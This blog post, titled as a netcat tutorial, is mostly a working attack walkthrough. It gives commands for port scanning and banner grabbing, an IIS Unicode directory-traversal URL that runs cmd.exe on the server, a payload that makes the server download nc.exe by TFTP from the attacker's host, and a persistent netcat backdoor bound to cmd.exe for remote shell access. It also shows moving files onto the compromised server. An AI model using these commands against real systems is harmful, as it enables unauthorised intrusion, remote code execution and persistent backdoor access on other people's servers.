Tuesday, January 25, 2022

Another netcat tutorial

 Port scanning 1 through 200:

nc -v -w2 -z 192.168.0.2 1-200

-------------------------------

Banner grabbing with nc:

nc -v -n 192.168.0.2 80

------------------------------
IIS Unicode File Traversal:

http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\  

Now we want to upload nc.exe to the vulnerable IIS server:

http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+192.168.1.9+GET+nc.exe


we used:
tftp -I 192.168.1.9 GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

as a TFTP server we can use: TFTPD32 by Ph. Jounin

---------------------------------

Netcat as a backdoor:

now we have nc.exe on the server and we want to create a backdoor to get a remote shell.

nc -L -p 1001 -d -e cmd.exe

-L -> do not close and wait for connections.
-p -> port
-d -> detach from the process we want it to run.
-e -> what program to run once the port is connected to (cmd.exe ).

If we not want to convert this command for Unicode URL use, it will look like this:

http://<exploir URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe

ex:
nc -v 192.168.80.14 80

GET http://192.168.80.14/scripts/..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+1001+-d+-e+cmd.exe

------------------------------------------------------

Transferring File with nc.exe:

We want to transfer a file called hack.txt to the IIS Server and we don't want to use TFTP .We can use nc.exe to transfer the file.

To receive a file named hack.txt on the destination system start Netcat on the IIS server with the following command:
nc -l -p 1234>hack.txt

On our source system ( the attacking computer ) we send a file named hack.txt to the IIS machine with the following
command:

nc destination 1234<hack.txt

Now we can see that the file has been transferred to the target system, via port 1234.

-----------------------------------------------------------